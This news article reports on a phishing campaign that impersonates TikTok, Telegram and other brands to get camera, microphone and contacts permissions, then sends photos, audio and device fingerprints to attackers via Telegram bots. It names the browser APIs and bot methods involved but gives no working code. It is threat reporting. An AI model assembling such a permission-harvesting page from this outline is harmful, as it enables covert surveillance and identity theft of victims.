AI-Driven Phishing Campaign Exploits Browser Permissions to Harvest Sensitive Data

A sophisticated phishing campaign has emerged, leveraging artificial intelligence to enhance its tactics, as revealed by Cyble Research & Intelligence Labs (CRIL). This campaign, active since early 2026, marks a significant shift from traditional credential theft methods to more invasive, technology-driven approaches.

Campaign Overview

The phishing operation employs a variety of social engineering tactics, utilizing themes such as ID scanning, Telegram ID freezing, and “Health Fund AI.” These deceptive strategies aim to manipulate users into granting access to sensitive hardware features, including cameras and microphones, under the pretense of verification or account recovery.

Once users grant these permissions, malicious scripts initiate extensive data collection. This data encompasses images, video recordings, audio from microphones, device specifications, contact details, and approximate geographic locations. The stolen information is then swiftly transmitted to systems controlled by the attackers via Telegram bots, facilitating efficient exfiltration.

Researchers have identified indications of AI-assisted code generation within the campaign’s infrastructure. The presence of structured annotations and unusual formatting in the scripts suggests that generative AI tools may have been employed to streamline the development and deployment processes.

Infrastructure and Attack Mechanism

The campaign predominantly utilizes the edgeone.app platform to host phishing pages, allowing for scalable and cost-effective deployment. These pages impersonate reputable platforms such as TikTok, Instagram, Telegram, Google Chrome, and even popular games like Flappy Bird, thereby fostering user trust.

Unlike conventional phishing attacks that rely on victims entering their credentials, this AI-driven campaign focuses on obtaining browser-level permissions. When a user interacts with a phishing page, JavaScript code triggers permission prompts. If accepted, the script activates the device camera, capturing live data.

A key technique involves rendering frames from a live video stream onto an HTML5 canvas using ctx.drawImage(), subsequently converting it into a JPEG file via canvas.toBlob(). This file is then transmitted to attackers through the Telegram Bot API, a method also used for video and audio recordings.

Expanded Data Collection Capabilities

The phishing framework extends beyond simple media capture, incorporating extensive device fingerprinting through various browser APIs, including:

• navigator.userAgent
• navigator.platform
• navigator.deviceMemory
• navigator.hardwareConcurrency
• navigator.connection
• navigator.getBattery

These methods enable attackers to gather detailed information about the victim’s device, such as the operating system, browser version, CPU capacity, RAM, network type, and battery status. Additionally, the script retrieves the victim’s IP address through external services, enriching it with geolocation data, including country, city, latitude, and longitude. This aggregated information is sent to the attackers before further data collection occurs.

The campaign also attempts to access contact lists using the browser’s Contacts Picker API. If users grant permission, names, phone numbers, and email addresses are extracted and transmitted.

Role of Telegram in Data Exfiltration

A notable aspect of this campaign is its reliance on Telegram for command-and-control operations. By utilizing Telegram bots, attackers eliminate the need for complex backend infrastructure. Data such as images, videos, and audio files are sent directly through API methods like sendPhoto, sendVideo, and sendAudio. This approach simplifies operations while providing attackers with immediate access to stolen information.

User Interface Deception

To maintain credibility, phishing pages display realistic status messages such as “Capturing photo,” “Sending to server,” and “Photo sent successfully.” These prompts mimic legitimate verification workflows, reinforcing the illusion of authenticity. Once the data is captured and transmitted, the script shuts down the camera and resets the interface, leaving minimal visible traces of the attack.

Risks and Business Impact

The implications of this AI-driven phishing campaign are substantial. By collecting biometric and contextual data, attackers gain powerful tools for:

• Identity theft and account takeover
• Bypassing video-based verification systems
• Targeted social engineering attacks
• Extortion using captured multimedia

For instance, images and audio recordings could be used to impersonate victims or bypass Know Your Customer (KYC) systems. Device and location data enable attackers to craft highly personalized attacks, thereby increasing their success rate.

Organizations face additional risks, including reputational damage, regulatory exposure, and financial losses. The use of impersonated brands further amplifies the threat by eroding trust in legitimate digital services.

One unusual finding in this campaign is the presence of emojis embedded within the script’s operational logic. While uncommon in manually written malware, such patterns are linked to AI-assisted code generation, suggesting that attackers may be leveraging generative AI tools to accelerate development and scale their operations.

As reported by thecyberexpress.com, this evolving threat landscape underscores the need for heightened vigilance and robust cybersecurity measures to protect against increasingly sophisticated phishing attacks.